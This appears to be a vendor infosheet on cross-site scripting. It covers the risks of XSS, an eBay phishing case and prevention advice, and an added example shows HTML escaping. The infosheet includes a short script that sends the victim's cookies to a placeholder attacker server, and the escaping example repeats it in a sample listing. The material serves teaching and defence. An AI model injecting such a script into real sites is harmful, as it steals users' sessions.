Vulnerability Decoder Cross Site Scripting Infosheet Resource

The document discusses the vulnerability of cross-site scripting (XSS) attacks, which allow attackers to inject client-side scripts. XSS vulnerabilities are common, with 49% of applications initially vulnerable. XSS can hijack user accounts, spread malware, and access browser histories. The document provides an example of cybercriminals using XSS to phish eBay users and recommends secure coding practices like sanitizing inputs to prevent XSS.

Uploaded by Mersal Thalaiva

VULNERABILITY DECODER

CROSS-SITE SCRIPTING

THE VULNERABILITY

Cross-site scripting (XSS) vulnerabilities give attackers the capability to inject client-side scripts into the application, for example, to redirect users to malicious websites.

49% of applications have a cross-site scripting vulnerability on initial scan.

THE RISKS

Cross-site scripting can be used to hijack user accounts, spread worms and Trojans, access browser history and clipboard contents, control the browser remotely, and scan and exploit online appliances and applications.

Example Breach

Cybercriminals exploited a persistent XSS vulnerability in the eBay website to embed malicious JavaScript in legitimate listings, redirecting them to spoofed eBay login pages for phishing user credentials.
PREVENTION & REMEDIATION

Cross-site scripting vulnerabilities are preventable with secure coding practices. For example, always sanitize input from search fields and forms. Convert user input to a single character encoding before parsing. And make sure all data is validated, filtered, or escaped before it's sent back to the user.

Here's an example of XSS session theft:

<script>
// Request a (non-existent) image whose URL carries the victim's cookies
var img = new Image();
img.src = "http://<some evil server>.com?" + document.cookie;
</script>
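The "escape before it's sent back to the user" advice above, applied to the listing scenario from the example breach: an added illustration, not code from the infosheet. It assumes a hypothetical server-side listing renderer (`renderListingUnsafe` / `renderListingSafe`), a constructed sample listing whose title carries the cookie-theft snippet shown above, and a small detection helper; the evil server name is a placeholder.

```javascript
// Added example (not from the Veracode infosheet): output-encoding a
// user-supplied listing title so embedded markup is shown as text, not run.
// All listing data below is constructed for the demonstration.

// Escape the five characters that carry meaning inside an HTML text node or
// a double/single-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: untrusted fields concatenated straight into markup.
// A stored title containing <script> becomes a persistent XSS for every viewer.
function renderListingUnsafe(listing) {
  return `<li class="listing"><b>${listing.title}</b> - ${listing.price}</li>`;
}

// Hardened pattern: every untrusted field is escaped at the point of output.
function renderListingSafe(listing) {
  return `<li class="listing"><b>${escapeHtml(listing.title)}</b> - ${escapeHtml(listing.price)}</li>`;
}

// Constructed sample listing: the title carries the infosheet's session-theft
// snippet (server name is a placeholder, as on the page).
const sampleListing = {
  title: 'Vintage camera<script>new Image().src="http://<some evil server>.com?"+document.cookie</script>',
  price: '$45',
};

// Detection aid for reviewing rendered output: does a fragment still contain
// live script markup? (Escaped text yields "&lt;script", which does not match.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe :', renderListingUnsafe(sampleListing));
console.log('safe   :', renderListingSafe(sampleListing));
console.log('unsafe still carries <script>?', containsScriptTag(renderListingUnsafe(sampleListing)));
console.log('safe still carries <script>?  ', containsScriptTag(renderListingSafe(sampleListing)));
```

This escaping is correct for HTML text and quoted attribute values only; data placed into a URL, a JavaScript string, or a CSS value needs the encoding for that context instead. Marking the session cookie HttpOnly keeps document.cookie from exposing it, which blunts this particular theft even when an XSS slips through.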

RECOMMENDATIONS

Nobody writes perfect code the first time around. You can avoid vulnerabilities and prevent breaches when you:

Get training in secure coding best practices, through on-demand eLearning courses, in-person security consultations, and professional development certifications and conferences.

Scan early and often to detect flaws while you code. Use application security tools that allow you to scan small batches of code instantaneously, and can provide remediation guidance within your development workflow.

Download the Secure Coding Best Practices Handbook

Learn More in the Veracode Community

Watch a Cross-Site Scripting Tutorial Video
